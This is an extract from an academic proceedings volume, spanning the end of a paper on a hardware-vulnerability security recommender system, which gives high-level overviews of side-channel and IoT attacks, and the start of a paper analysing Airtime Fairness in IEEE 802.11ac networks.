multiple key bits simultaneously using CPA. However, this attack is sensitive to approximation errors that may be caused by fk. • In a Template Attack, the attacker utilizes the probability density function (pdf) of the L(k) leakage for all possible keys, which requires an approximation of fk and the corresponding errors. With knowledge of the mentioned pdf, the attacker can select the key k* using Maximum Likelihood Approximation [4]. • Intel management engine - The Intel Management Engine (ME) is a dedicated microcontroller, which is integrated in many central processing units that are produced by Intel Corporation. The Intel ME is used for different tasks in the system, such as the out-of-band (OOB) administrative tasks, the Capability Licensing Service (CLS), the Anti-Theft Protection and the Protected Audio Video Path (PAVP). The Intel Management Engine runs under its own lightweight operating system, which offers special commands and a simple interface. • During the attacks that are conducted on the central processing units, the hackers are using the operating system of the Intel Management Engine as a backdoor. Thus, during the attack on the Intel Management Engine, the hacker can load and execute malicious code, which is hidden from the user and the security mechanisms of the operating system. Such an attack may cause instability of the entire computer system, and even cause it to crash. Furthermore, there are a lot of critical vulnerabilities that are found in the Intel Management Engine, and their patching requires an update of
624
•
•
• •
•
•
M. Iavich et al.
the wireframe. This should be done at the manufacturer’s side, which means that a lot of outdated systems are not getting the proper updates, and stay vulnerable. The IoT ecosystem is a significant area of research and development in the modern cyber world. The use of smart devices has experienced substantial growth in recent years, enabling technical and repetitive tasks such as data collection and sorting, as well as sending and receiving notifications. In complex industrial settings, IoT-based smart systems are being used to automate vehicle assembly processes in modern car factories. Interestingly, the concept of a smart home has evolved from merely automating different processes to solving practical problems with a broader scope, such as reducing natural resource usage. However, with the increase in the usage of smart devices worldwide, the risk of cyberattacks targeting IoT-based computing environments has also grown. Cyber attackers are increasingly able to adapt to various software and hardware configurations of targeted devices. Most attacks target data centers that control devices that are part of one or more networks. IoT devices are vulnerable to cyberattacks, which can be categorized based on their nature. Attackers can gain access to smart devices through outdated software or hardware managed by special firmware. Hardware vulnerabilities are harder to detect and fix than software flaws, making it necessary to comprehensively analyze existing hardware security measures for modern devices and develop new approaches to increase understanding of existing security issues and improve hardware security mechanisms. There are various potential attacks on IoT devices, which can be grouped into the following categories based on our research: [9–11]. The primary objective of a hacker in physical attacks is to carry out a successful attack, although the methods used may vary. These attacks require direct contact with the IoT device, and typically result in broken hardware due to various physical factors. Additionally, IoT devices located in outside buildings are rather vulnerable to physical attacks. In reconnaissance attacks on IoT devices, hackers do not perform any authorized manipulations on the system or network. Instead, these attacks involve port scanning, packet sniffing, and analysis of network traffic. Distributed Denial-of-Service (DDoS) attacks are the most common type of attack, typically carried out using infected devices (botnets) to target a specific system. The goal of such attacks is to flood the targeted system with large amounts of illegitimate requests, rendering it unavailable. The IoT ecosystem is a significant area of research and development in the modern cyber world. The use of smart devicAccess attacks refer to the unauthorized access gained by hackers to certain networks or devices. These attacks can be executed either physically by accessing the system, or remotely, with the latter being less risky for the attacker and therefore more commonly used. Privacy attacks pose a significant challenge in the context of IoT, primarily because of the vast amount of information that is easily accessible through remote access channels. Data mining and cyber espionage are common attacks that compromise privacy.
Developing Security Recommender System
625
6 The Experiment Results Preventing attacks on devices that contain and transmit confidential information is crucial, particularly in larger organizations with prevalent hardware infrastructure issues. The ability to remotely execute hardware-based attacks poses a significant threat to many systems, making hardware a critical research area in cybersecurity that demands attention from both end-users and manufacturers [12]. Accurate management of processes that rely on specialized hardware, such as IoT-based systems that control industrial machines or manage stores, is vital. Establishing a standard security mechanism that applies to any modern hardware-oriented system is a complex process, and manufacturers use existing standards to build micro-schemes and hardware components that are primarily managed by dedicated software [13]. This software can be designed for a specific system or a group of systems, and manufacturers typically use various dedicated cores, which are a combination of hardware and software, to manage specific systems. External hardware or software components are often used to hack the system in potential attack models [14] (Fig. 2).
Fig. 2. Interactive form on the platform
Our research team has developed a web-based application capable of checking the hardware of various devices, including classic, industrial, office, and IoT devices. This recognition system is freely available and utilizes a trusted resources list stored in its database to assess the devices. The database contains information from well-known online vulnerability detection and indication platforms such as AttackerKB, ExploitDB, CVE MITRE, and National Vulnerability Database. The system is based on the most
626
M. Iavich et al.
relevant information from these sources and stores data related to new hardware-based attack vectors, new vulnerabilities in existing products, and security issues in outdated versions of the wireframes. Users can enter specific search queries to obtain detailed information on existing security issues in the target product, along with recommendations for increasing its level of security.
Fig. 3. Popular search queries
Together with the queries and trends from famous vulnerability and cyber security databases, the system collects information about internal cases based on different search queries performed by the users of the system. The Fig. 3 illustrates some popular search queries in the frame of the platform and the system stores in the local database. For better user behavior tracking on the platform, the form for user input is available only for authorized users. Each user has personal profile with specific statistical data (Fig. 4).
Fig. 4. Authorization form
As we can see on Fig. 5, based on search form input the user gets recommendation with separated components, such number employees, server configuration and number of the machines in organization. Together with component fields, the users are provided with detailed recommendation based on the content. The system also gives user information about useful links on popular security-related resources based on the industry/category and globalization of the organization of the user (Fig. 6). This approach also uses machine learning elements to make the final recommendations more relevant. Each user of the system has personal rating and individual search
Developing Security Recommender System
627
Fig. 5. Concrete search query result
Fig. 6. Useful links provided by the system
queries list that helps the platform to work more accurate. The date form the profile of the user will be extremely helpful on recommendation generation stage. The system works by gathering information about the specific hardware used in the product being tested. As side-channel attacks are common on hardware, the system is designed to analyze the leakage of intermediate result z. Since the leakage caused by z can be presented as a function of the key value k*, the system can evaluate the potential level of leakage using corresponding parameters and an independent noise variable ε. To collect information about hardware-based issues, the system relies on trusted sources. After collecting the data, the system generates relevant recommendations and prioritizes them based on criteria such as relevancy, date of indication, spread, general information, and risk level. By considering these factors, the system provides the user with the most practical and useful recommendation for the particular issue. The data collected is based on common attacks on hardware in several categories, including office equipment, industrial devices, IoT devices, and classical devices used by average users. Figure 7 shows the results of the corresponding analysis. Based on the analysis results, it can be concluded that the type and frequency of attacks vary depending on the industry, use case context, and usage scope of each device. Due to the diverse nature of hardware-based attacks, it is not feasible to create a universal security mechanism that can be applied to all devices. Therefore, each device or hardware-based system must analyzed independently, taking into consideration its technical specifications, implementation architecture, vendor,
628
M. Iavich et al.
Fig. 7. Types of the attacks in different directions
and wireframe versions. This approach is necessary to develop a customized security mechanism that is effective in preventing attacks on the particular device or system.
7 User-Oriented Approaches Together with security mechanisms the usability of user-oriented system is also very important issue. To create comfortable and understandable system the components of human computer interaction (HCI) must be considered and implemented into the final product. HCI can be considered as multidisciplinary topic of research that is focused on the design of computer technology and, concretely, the humans (users) and computers interaction. The field of human-computer interaction (HCI) originated with computers, but it has since expanded to encompass almost all aspects of information technology design. HCI components are now used in nearly every user-oriented system to enhance the user experience and make it more comfortable and understandable. HCI is the subject of a great deal of academic research, and those who study and work in this field consider it a critical tool for promoting the idea that computer-user interaction should resemble an open-ended discourse between humans (Fig. 8). Initially, HCI researchers focused on enhancing the usability of desktop computers. However, with the widespread availability of new technologies such as the Internet and smartphones, computer use is shifting toward mobile devices. HCI is a broad field that intersects with various areas, including user-centered design (UCD), user interface (UI) design, and user experience (UX) design. Despite this overlap, there are some distinctions between HCI and UX design. HCI practitioners tend to be more academically oriented and participate in scientific research and the development of empirical user understandings. UX designers, on the other hand, are primarily focused on industry and involved in creating products or services, such as smartphone apps and websites. While UX designers have access to a wealth of materials thanks to the vast range of issues covered by HCI, much of the research is still geared toward academic audiences.
Developing Security Recommender System
629
Fig. 8. Human-computer interaction components
Designers, on the other hand, do not have the luxury of time that HCI professionals do. As a result, we must go beyond our industry-imposed limitations in order to have access to these more academic insights. When the system is good at it, it will be able to harness critical insights to create the best designs for the users. The concept of usability was and continues to be the primary technical focus of HCI. The term “simple to learn, easy to use” first expressed this concept in a somewhat simplistic way. This conceptualization’s raw simplicity gave HCI an edgy and strong character in computing. It served to bring the field together and to help it have a larger and more effective impact on computer science and technology development. However, within the field of human-computer interaction, the concept of usability has been rearticulated and reconstructed on a near-constant basis, becoming increasingly rich and intriguingly challenging. Fun, well-being, social efficacy, aesthetic tension, enhanced creativity, flow, support for human development, and other attributes are increasingly frequently combined together as usability. A more dynamic perspective on usability is a programmatic goal that should and will evolve as our ability to reach further toward it improves. 7.1 HCI and Recommender Researchers have recognized in recent years that the effectiveness of recommender systems extends beyond recommendation accuracy. As a result, there has been a surge in interest in human factors research, such as merging interactive visualization techniques with recommendation algorithms to improve transparency and controllability in the recommendation process. Interaction emphasizes user involvement through discourse with the technology, whereas visualization relies on visual representations to aid human perception [15].
630
M. Iavich et al.
As we mentioned, usability is one of the most important components in user experience of the system and with a high level of security, user-oriented system must be developed considering the best usability practices. From user perspective we can divide usability measures into the following components: • Speed is a metric for determining how quickly a user can complete a task. Quicker performed task in the system means higher speed. • Efficiency is the number of errors committed by the user while completing the task is measured. • Learnability – how easy is it for the user to learn how to use the system. • User feedback – what users like more in the system. • Memorability – how quickly the user has figured out how simple it is to remember how to operate the system. It is possible to achieve a good level of the usability for some of the mentioned components, but not for all of them. Because for any user-oriented system we need to take into account security as well. More security system means, that the level of usability is decreased. There are different methods to measure each component of usability. If we need to measure the speed of the system, the measurement is the time, and if we need to measure efficiency – counting errors. In the case of learnability, memorability and user preferences we have different situation. We frequently consider how long it takes a user to learn how to utilize a system when assessing Learnability. So, we’ve got a chart here that shows how long it takes a user to log in. We also have a sequence of failed log-in attempts running across the bottom. The initial log in may take five seconds, the second four seconds, the third three seconds, and so on, until the time it takes them to log in is leveling out towards the end. This chart displays how long it takes people to learn something. As well as an understanding of the learning curve. We may have a system that looks like this, but we could also have a system where it takes a long time for many log-in tries before something clicks and the users are able to finish the task fast. Figure 9 illustrates the measurement of learnability. To test memorability, we can start the same way and then wait a lengthy time before having the user return to the system and observe how long it takes them to log in. It could take a lengthy time, indicating poor Memorability, or they could log in as quickly as they did the previous time they used the system. This indicates that the system is easily remembered. It’s likely that we’ll have a value somewhere in the middle, where consumers may require a bit longer time to re-acquaint themselves with the system after an extended pause. But, hopefully, they aren’t reverting to the same degree of proficiency with the system as when they initially learned how to use it. Finally, we want to determine User Preference. This is something we do with questionnaires and surveys, respectively. On a variety of systems, there are various standard questionnaires and surveys for gauging user preference. Users can rank things on a scale, therefore they are things you can provide them. And conducting interviews in which you sit down with people while they’re using the system and have them explain what they like and don’t like can provide you with a lot more information about their preferences.
Developing Security Recommender System
631
Learnability measure 6 5 4 3 2 1 0 Login one
Login two
Login three
Login four
Fig. 9. Measuring learnability
8 Discussion Throughout our research, we conducted tests on various devices and hardware-oriented software platforms owned by different organizations. The testing phase lasted for four months, during which participating organizations tested their systems once a month to provide us with the required data to monitor improvements in the security level. The presented system was used to test devices that are used daily in various organizations for different purposes. The enrolled organizations provided us with data that generated an extensive list of recommendations, synthetically presented in the Fig. 10. The data collected pertained to three categories of different cybersecurity issues: hardware problems, the problems of configuration, and expired wireframes. The analysis revealed that the most often security problem was related to improper hardware configuration, which could lead to serious issues in the future. Accordingly, recommendations were provided to the affected organizations. The system’s logic core prioritized the determination of optimal recommendations that could resolve existing problems, while also accounting for relevant system updates and possible future variations. Based on practical performance assessments, regular use of the system was found to have a positive impact on the security level of the concerned (as shown in references [16, 17]). The system has been tested and assessed using data generated by various European institutions that adhere to GDPR rules. In most cases, the system successfully addressed the detected issues. While standard cryptographic algorithms are considered secure against classical computer attacks, hardware-based side-channel attacks remain a major challenge in computer science. The system presented in this paper offers a solution to this problem. Modern hardware-based vulnerabilities recognition system uses new approach to analyze the problem based on concrete scenario. New approach uses famous hardware vulnerability databases considering the state of analyzed system.
632
M. Iavich et al.
Fig. 10. Testing period of the system
Different hardware-based attacks today are successfully performed even on famous systems in business, education and financial spheres. This fact makes modern recommendations system unique and suitable to the particular situation. This means that based on provided approach, many organizations working in different directions can fill out the security gaps in hardware-based systems and consequently will increase their security level [18–20]. The methods used in recommendations system are based on the practical analyzing approaches and popular databases. This fact makes the recommendations relevant and useful for the end users as well as for organizations.
9 Conclusions Given the importance of hardware-based systems in many businesses’ day-to-day operations, enhancing device security methods is a vital component of system maintenance. As a result, we intend to enhance the security issues identification system’s capability by providing options that allow users to select their user level. As a result, the system must choose the appropriate technique to tackle the existing security problem of the hardwarebased system based on the user’s specified skill level, increasing the applicability of such a method to solve cybersecurity concerns in a wider variety of businesses. Furthermore, the algorithmic core will be supplemented with necessary machine learning aspects in order to improve the usefulness of the reports generated by the system, as well as the end users’ overall experience. As a result, specific analysis procedures will examine the data in the database, taking into account freshly input data as well, combine the existing data, and eventually add the necessary extra data to the database. By integrating new data sources based on popular end-user searches, this technique will effectively enhance the relevance of the recommendations.
Developing Security Recommender System
633
The aim of the research presented in this paper was to identify the vulnerabilities of hardware-based devices and the associated software systems to enhance the required security mechanisms. The involvement of the user into this process makes the calibration of the security mechanism more effective. Improving the education of end-users regarding security issues can increase the likelihood of detecting such issues and identifying appropriate solutions. The developed software system will assist end-users in comprehending the source and structure of security issues [21–22], enabling them to take appropriate action. As attack strategies are continuously evolving, the system can assist users in adopting optimal mitigation strategies. Additionally, the system is suitable for securing the hardware-based infrastructure of larger organizations, ensuring compliance with stringent regulations such as the European General Data Protection Regulation, and effective implementation in practice. Acknowledgement. This work was supported by Shota Rustaveli National Foundation of Georgia (SRNSFG) [NFR-22-14060].
References 1. Wang, X., Li, Z., Yang, Y.: Deep learning based side-channel analysis: a survey. IEEE Access 8, 202671–202694 (2020). https://doi.org/10.1109/access.2020.3031811 2. Bhunia, S., Hsiao, M.S., Narasimhan, S.: Hardware Trojan attacks: threat analysis and countermeasures. Proc. IEEE 102(8), 1229–1247 (2014). https://doi.org/10.1109/JPROC.2014. 2334493 3. Moradi, A., Kuhn, M.G., Paar, C.: Hash function design strategies for counteracting sidechannel attacks. IACR Trans. Cryptogr. Hardw. Embed. Syst. 2011(4), 87–108 (2011). https:// doi.org/10.1007/978-3-642-23822-2_6 4. Abomhara, M., Køien, G.M.: Cyber security and the internet of things: vulnerabilities, threats, intruders and attacks. J. Cyber Secur. Mobil. 4(1), 65–68 (2015) 5. Wang, H., Forte, D., Tehranipoor, M.M., Shi, Q.: Probing attacks on integrated circuits: challenges and research opportunities. IEEE Des. Test 34(5), 63–71 (2017). https://doi.org/ 10.1109/MDAT.2017.2729398 6. Dan, P.: Theoretical use of cache memory as a cryptanalytic side-channel. IACR Cryptology ePrint Archive, vol. 169, pp. 170–184 (2002) 7. Samer, M., Fayez, G., Aaron, G.T.: Hardware attacks: an algebraic approach. J. Cryptogr. Eng. 6, 325–337 (2006). https://doi.org/10.1007/s13389-016-0117-6 8. Samer, M., Gebali, F., Gulliver, T., et al.: Hardware attack risk assessment. In: ICES, vol. 1109 (2015). https://doi.org/10.1109/ICCES.2015.7393073 9. Imani, M., Shirani-Mehr, H., Naderi, H., Tehranipoor, M.: A survey of hardware Trojan taxonomy and detection. IEEE Des. Test 36(1), 55–73 (2019). https://doi.org/10.1109/MDAT. 2018.2871403 10. Austin, T.: Hardware security: an overview of the state of the art. In: IEEE Security & Privacy, vol. 13, no. 4, pp. 24–29, July-Aug. 2015. https://doi.org/10.1109/MSP.2015.78 11. Huang, Z., Wang, Q., Chen, Y., Jiang, X.: A survey on machine learning against hardware Trojan attacks: recent advances and challenges. IEEE Access 8, 10796–10826 (2020). https:// doi.org/10.1109/ACCESS.2020.2965016
634
M. Iavich et al.
12. Iavich, M., Iashvili, G., Gagnidze, A., et al.: Lattice based Merkle. In: IVUS 2019, Kaunas 25 April 2019: Proceedings. - CEUR-WS – 2019, vol. 2470, pp. 13–16 (2019) 13. Calero Valdez, A., Ziefle, M., Verbert, K.: HCI for recommender systems: the past, the present and the future. In: Proceedings of the 10th ACM Conference on Recommender Systems (RecSys 2016). Association for Computing Machinery, New York, NY, USA, pp. 123–126 (2016). https://doi.org/10.1145/2959100.2959158 14. Bhunia, S., Abramovici, M., Agrawal, D., et al.: Protection against hardware Trojan attacks: towards a comprehensive solution. IEEE Des. Test 30, 6–17 (2013) 15. Gagnidze, A., Iavich, M., Iashvili, G.: Novel version of Merkle cryptosystem. Bull. Georgian Natl. Acad. Sci. 11(4), 28–33 (2017) 16. Nawir, M., Amir, A., Yaakob, N., Lynn, O.B.: Internet of things (IoT): taxonomy of security attacks. In: 2016 3rd International Conference on Electronic Design (ICED), Phuket, Thailand, 2016, pp. 321–326 (2016). https://doi.org/10.1109/ICED.2016.7804660 17. Ronen, E., Shamir, A.: Extended functionality attacks on IoT devices: the case of smart lights. In: European Symposium on Security and Privacy, Saarbrücken 21–24 March 2016: Proceedings, pp. 3–12. IEEE (2016) 18. Iashvili, G., Iavich, M., Gagnidze, A., Gnatyuk, S.: Increasing usability of TLS certificate generation process using secure design. In: CEUR Workshop Proceedings, vol. 2698, pp. 35– 41 (2020) 19. Gao, P., et al.: Enabling efficient cyber threat hunting with cyber threat intelligence. In: 2021 IEEE 37th International Conference on Data Engineering (ICDE), Chania, Greece, 2021, pp. 193–204 (2021). https://doi.org/10.1109/ICDE51399.2021.00024 20. Iavich, M., Gnatyuk, S., Odarchenko, R., Bocu, R., Simonov, S.: The novel system of attacks detection in 5G. In: Barolli, L., Woungang, I., Enokido, T. (eds.) AINA 2021. LNNS, vol. 226, pp. 580–591. Springer, Cham (2021). https://doi.org/10.1007/978-3-030-75075-6_47
Analysis of Airtime Fairness Technology Application for Fair Allocation of Time Resources for IEEE 802.11 Networks Liubov Tokar(B)
and Yana Krasnozheniuk
Kharkiv National University of Radio Electronics, 14 Nauky Ave., Kharkiv, Ukraine {liubov.tokar,yana.krasnozheniuk}@nure.ua
Abstract. It is considered that with the simultaneous operation of two or more wireless users, which differ in speed performance, the phenomena of air monopolization appear, which is reflected in the imperfection of the built-in mechanisms of the IEEE 802.11 standard and the distribution of air time. The influence of the Airtime Fairness technology on the performance and quality of the Wi-Fi wireless network of the IEEE 802.11ac standard is investigated. The features of implementing of algorithms for the operation of the Airtime Fairness technology are considered, and the theoretical substantiation of the efficiency of this technology is presented. Statistical data were obtained aimed at optimizing the process of data transmission over the air. The collection and analysis of network performance indicators was carried out when activating the Airtime Fairness mechanisms with the preservation of all preliminary settings, equipment locations, locations of wireless users and their number. An analysis of the main indicators of the performance and quality of the wireless network is presented: the average traffic speed, packet performance and the number of TCP packets with loss or damage or re-transmitted to the network. It was revealed that the performance indicators of the network during the operation of the Airtime Fairness technology can vary depending on the equipment manufacturer and the technology operating mechanisms used by the manufacturer. It has been proven that the use of Airtime Fairness technology is advisable, but only with a full understanding of the performance mechanisms and features together with a clear understanding of the impact of this technology on the network and on each individual user. Keywords: Wireless Network · Airtime Fairness · Access · Wi-Fi Technology
1 Introduction Most commercial organizations implement high-speed wireless networks due to their mobility and ease of deployment. The advantages of Wi-Fi wireless technologies include the ease of deploying and folding the network. An important point is the ability to easily connect subscriber devices © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 635–655, 2023. https://doi.org/10.1007/978-3-031-35467-0_38
636
L. Tokar and Y. Krasnozheniuk
to the network while ensuring the security of data transmission and without restricting the user’s movement in the network coverage area. The main disadvantages when using wireless systems are the following: problems associated with signal propagation, unstable and non-linear attenuation, interference, noise, and power and bandwidth limitations. These problems are successfully overcome by hardware and software. However, other than the obvious benefits of portability and being free from wires, there are less obvious problems. A number of issues should be highlighted regarding the imperfection of the technologies themselves, a large number of various devices, and devices of different generations in the air, which are only partially compatible, etc. Despite the key features and advantages, the Wi-Fi family of technologies has several significant disadvantages of the system operation, which are critical under certain conditions. The shortcomings can be caused by both the air physical features and the imperfection of the IEEE 802.11 technology. The paper investigates the impact of Airtime Fairness technology, the mechanisms of which are aimed at solving one of the critical problems for wireless network performance, such as monopolization of airtime by slow-speed users. For this, the influence of this technology on performance indicators is shown on the example of a wireless network of the IEEE 802.11ac standard – the most modern and widespread standard among office user devices. The phenomenon of air monopolization with the simultaneous operation of two or more wireless users, which are quite differentiated in terms of air operation speed indicators, is associated with the imperfection of the built-in mechanisms and the distribution of airtime in the standard. The IEEE 802.11ac standard was not designed to cope with highly differentiated user devices. The CSMA/CA access distribution mechanism, which is incorporated in the technology, is based on the principle of dividing access to the air by the amount of transmitted data. Considering that, subscriber devices operate at approximately similar speeds, the distribution of airtime can be considered fair. But, when devices are connected to the network at a very low speed, unlike other devices, a slow device monopolizes airtime, reducing both the bandwidth of a single device and of the network in general. Based on theoretical considerations, the mechanisms of Airtime Fairness technology can reduce the impact of a slow-speed user on the overall performance of a wireless network. To do this, we studied the influence of Airtime Fairness technology on the performance and efficiency of the network, namely: on the indicators of packet performance, delay, QoS indicators on the example of a corporate scattered network, with the simultaneous operation of both fixed and mobile wireless devices. 1.1 Rationale of Airtime Fairness for IEEE 802.11 Multispeed Networks A characteristic feature of wireless communication with multiple end devices is sharing the same bandwidth for independent transmission of information. The only method for dividing information flows is time division, that is, independent data transmission of each of the users operating on a common frequency is possible only when transmitting data in turn, provided there is free air.
Analysis of Airtime Fairness Technology Application
637
Given that the states of channels and nodes in a wireless network may differ, a Wi-Fi network operates at several possible data transfer rates. It is well known that the use of multiple data rates provides individual fairness; however, this causes anomalies in Wi-Fi performance where the performance of a node using a higher data rate can be reduced to the performance of another node using a lower data rate. In addition, we should take into account the probability that devices of different generations, having different signal-tonoise ratios, using different modulation, coding, etc. thus operating at their own channel rate, will request airtime which cannot be predicted or forecasted in advance. Therefore, a situation is created when devices with different channel rates simultaneously apply for airtime. The 802.11ac standard allows users to access the network based on the amount of information sent, which poses the problem of monopolizing airtime by users with slower speed. According to the standard, the amount of information transmitted by users is the same. Thus, the problem arises of equality of data transmission rates for all network users, regardless of their channel speed (Fig. 1).
Fig. 1. Diagram of the airtime distribution between users
Airtime fairness, or time-based fairness, is well known as a method of addressing Wi-Fi performance anomalies and balancing spectrum efficiency in multispeed wireless networks. The tasks of increasing the efficiency and equal allocation of channel resources between competing nodes are solved at different levels. In [1], it is proposed to use additional extensions to the CSMA/ECA mechanism: Hysteresis and Fair Share, which will provide support for a large number of users to reduce collisions. To some extent, these algorithms can improve system bandwidth and short-term fair use of the channel. In [2], the authors discuss Media Access Control (MAC) design issues related to the fact that high collision is often caused by the Binary Exponential Backoff (BEB) mechanism in the outdated IEEE 802.11 standards, and the common channel can be overused by nodes with a low bit rate. In high-density scenarios, it is proposed to use differential reservation algorithms (DR and GDR) to reduce collisions between competing nodes by setting its backoff counter with a deterministic value after a successful channel access. In [3], the authors implement a portable airtime scheduler that works on any Linuxbased Wi-Fi device. A similar solution [4] allows one order of magnitude to reduce the waiting time under load, significantly increase the bandwidth of several stations and almost perfectly balance the airtime for both TCP and UDP downlink traffic. A queuing scheme has been developed that eliminates excess buffer capacity in a wireless network.
638
L. Tokar and Y. Krasnozheniuk
The practical method for assessing proposed in [5], allows to indirectly assessing the fairness of airtime by measuring the bandwidth. The concept of responsible airtime is given, which covers not only the time of data transmission in the TCP ACK segment in TCP traffic. In [6], a distributed algorithm for the distribution of airtime, based on the idea of decomposition, for users of mobile social networks (MSN) is proposed. The aim of this algorithm is to select a user with a large energy budget, low sensitivity to energy consumption and a high propagation rate, located in the center of the group. To model this problem, a game-theoretic approach is considered and the Nash bargaining problem is formulated. 1.2 Mechanism for Extended Distributed Channel Access For a deeper understanding of mechanism principles of fair air access, it is better to give a etailed consideration of existing and available mechanisms for optimizing the use of air by disparate user devices. Let us consider one of the access control implementation in the IEEE 802.11 MAC layer standard [7]. A feature of the MAC layer of the IEEE 802.11 standard is the CSMA/CA mechanism and its most important RTS/CTS algorithm, which provides the possibility of alternate data transmission. This carrier sense multiple access mechanism provides random sequential data transmission in a wireless network. A significant drawback of the 802.11 standard is the lack of prioritized media access mechanisms, i.e., the initial specification of the standard was not designed to meet QoS requirements. All users of the wireless network had equal rights to both access to the air and the use of airtime. The algorithm of the CSMA/CA mechanism can be represented as follows. Any device during transmission listens to the air for checking interference in the form of information transmission by another device. If the air is free for a certain time, the user starts data exchange. All devices that also work in the network wait for the current transfer to complete, pause, and then, provided the air is free, start data transfer. At the same time, peer-to-peer devices, provided free air, have equal rights and an equal probability of starting data transmission next, but there is still a possibility of collision when two devices start transmitting simultaneously. The Enhanced Distributed Channel Access (EDCA) mechanism [8, 9] has become an addition to the IEEE 802.11e standard. The EDCA mechanism adheres to the principle of “intrusive courtesy”, but introduces controlled unfairness in order to provide preferential access to the air for certain priority traffic types. In fact, this is expressed in a mandatory minimum waiting time before the start of transmission, and the set of random values of transmission delays for some types of traffic is less important. Using the value of the ToS or DSCP field, the EDCA engine categorizes all existing traffic into several basic types. Thus, traffic classified as voice has a lower delay before transmission than traffic classified as video. It waits less time than traffic classified as “Best-effort”, which in turn waits less time than traffic classified as “Other”. Thus, some types of traffic are prioritized because they received a permission for transmission start earlier. Accordingly, all other devices or traffic of lower priority have to wait for the end of transmission of higher priority traffic.
Analysis of Airtime Fairness Technology Application
639
This method is more likely to meet QoS requirements, but does not solve the problems of devices differentiated by channel rate at all. 1.3 Theoretical Basics of Airtime Fairness Technology Airtime Fairness technology algorithms are based on TDMA – Time Division Multiple Access. The principle of the technology lies in the use of a cyclical method for dividing airtime between users: for equal or for specified periods of time. This approach will solve the issue of excessive use of airtime for the transmission of a relatively small amount of data by users that for a certain reason operate at a much lower channel speed compared to other network users. Thus, Airtime Fairness is the technology for ensuring fair access to the air, which is based on the principle of equality of the operating time on the air for each of network users, regardless of their channel speed (Fig. 2).
Fig. 2. Diagram of airtime distribution when using the Airtime Fairness technology
Depending on the manufacturer of the equipment, and, hence, on the specific implementation of the technology, the algorithm for dividing the airtime between users may differ. There are two main types of airtime division: into equal periods of time, regardless of the user’s parameters, and into arbitrary periods of time, depending on the administrative settings of the system. It is known that slower devices take relatively longer time to send and receive data compared to newer and faster devices. The implication of this claim is that there is less time on the air for faster devices, while slower devices disproportionately monopolize the air. As indicated above, one of the reasons for this behavior is the significant distance from the access point of one or more user devices. Another reason could be outdated equipment that does not support high-speed transmission modes. For example, let us analyze the indicators of the time spent in the network by users with different speeds and MCS indices [10–12]. To transfer one Mbyte of information, a user operating at a speed of 400 Mbps will take significantly less time than a user operating at a speed of 54 Mbps, which is displayed by Formulas (1) and (2): ttr MCS9 =
1 Mbyte · 8 8 Mbps = = 0,02 s 400 Mbps 400 Mbps
(1)
ttr MCS2 =
8 Mbps 1 Mbyte · 8 = = 0,148 s 54 Mbps 54 Mbps
(2)
640
L. Tokar and Y. Krasnozheniuk
Thus, on the air, a situation arises when, with an equal volume of transmitted data, a remote user will occupy 88% of the airtime (Formula 3): t =
0,148 ttr MCS2 · 100 = 88% = ttr MCS2 + ttr MCS9 0,148 + 0,02
(3)
and the average bandwidth of the access point will be 11,9 Mbps (Formula 4): C=
1 · 2 Mbps = 11,9 Mbps ttr MCS2 + ttr MCS9
(4)
Unlike the 802.11ac standard, Airtime Fairness technology provides equal access to the air for all user devices in time. That is, users of the access point with the enabled technology get equal airtime for data transmission. Using the example above, let us calculate the average performance of the access point if each subscriber is given 0,5 s for data transmission. Formula (5) displays the amount of data transferred per second of airtime for a high-speed user, Formula (6) – for a slow-speed user. C1C = C2C =
0,5 s t tr MCS9
· 1 Mbps =
0,5 s · 1 Mbps = 250 Mbps 0,02 s
0,5 s 0,5 s · 1 Mbps = · 1 Mbps = 3,38 Mbps ttr MCS2 0,148 s
(5) (6)
Based on Formulas (5) and (6), it can be seen that when using the method of fair access to the air based on time, and not on the amount of transmitted data, the average bandwidth of the access point will be 253,38 Mbps. This is over 21 times more than the fair access method, which is based on the amount of data transferred. It should be noted that when using the Airtime Fairness technology, with an increase in the average air bandwidth, a user slower speed will significantly lose in bandwidth. In addition, delays will increase and QoS requirements will be nearly impossible to meet. This is the key disadvantage of the above technology. 1.4 Condtions for Selecting IEEE 802.11ac Standard The selection of the IEEE 802.11ac standard for research is conditioned by several reasons. The 5 GHz band, in contrast to the 2 GHz band, maximally contributes to the construction of high-speed, time-stable and predictable wireless networks in terms of quality parameters. This leads to a much larger spectrum bandwidth for IEEE 802.11 networks, the sufficient number of non-overlapping channels, which provides the possibility of a greater distance from access points operating on the same frequency channel, and allows to build a better frequency plan [13]. In high-density environments, 5 GHz radio modules can be physically collocated to increase network capacity across multiple channels. In this range, the relative purity of the air is noted, which leads to an increase in the stability and the connection speed. In addition, the 802.11ac standard optionally supports the Beamforming technology, which solves the problem of signal power drop caused by its reflection from various objects and surfaces [14]. The 802.11ac standard is selected among the standards that support operation in the 5 GHz range due to the following factors: a large number of compatible user devices at
Analysis of Airtime Fairness Technology Application
641
the same time; availability; flexibility over Wi-Fi 6, 802.11n and earlier technologies; support for extreme channel speeds; support for additional technologies, such as MUMIMO, aimed at improving existing performance indicators. Figure 3 shows the increase in the channel speed of the 802.11ac standard in comparison with its predecessors [15].
Fig. 3. Comparison of channel rates of IEEE 802.11 standards
1.5 Features of Implementing Airtime Fairness Technology on Edimax Equipment Despite the fact that the Airtime Fairness technology is implemented in software, the choice of specific equipment based on technical characteristics is not optimal for this study. The choice of the vendor for creating the conditions and carrying out the experiment is also not essential, since the results received under the same conditions and with similar settings, but using similar equipment from another vendor, will differ due to the lack of uniform standardization. The choice of equipment for the study is based on the following conditions: the required number and the possibility of loading access points with a significant number of users that will move in space, move away and approach the access point, which will allow monitoring the state of the network and the value of the current average bandwidth for an arbitrary time interval. This, in turn, guarantees the maximum degree of reliability of the data obtained, even if the study is carried out over several days. The study used Edimax equipment with access points of the CAP1300 business segment. The implementation of Airtime Fairness technology in the CAP1300 access points has the following characteristics: – Processing of data received from the radio module after scanning the airtime usage is stored in memory and processed over several tens or hundreds of data transmission sessions. This will allow the user to quickly move away from the access point, reducing their channel speed and gradually decreasing the allocated bandwidth for transmission, which, in turn, minimizes the probability of queue congestion on the user interface and minimizes the number of dropped packets;
642
L. Tokar and Y. Krasnozheniuk
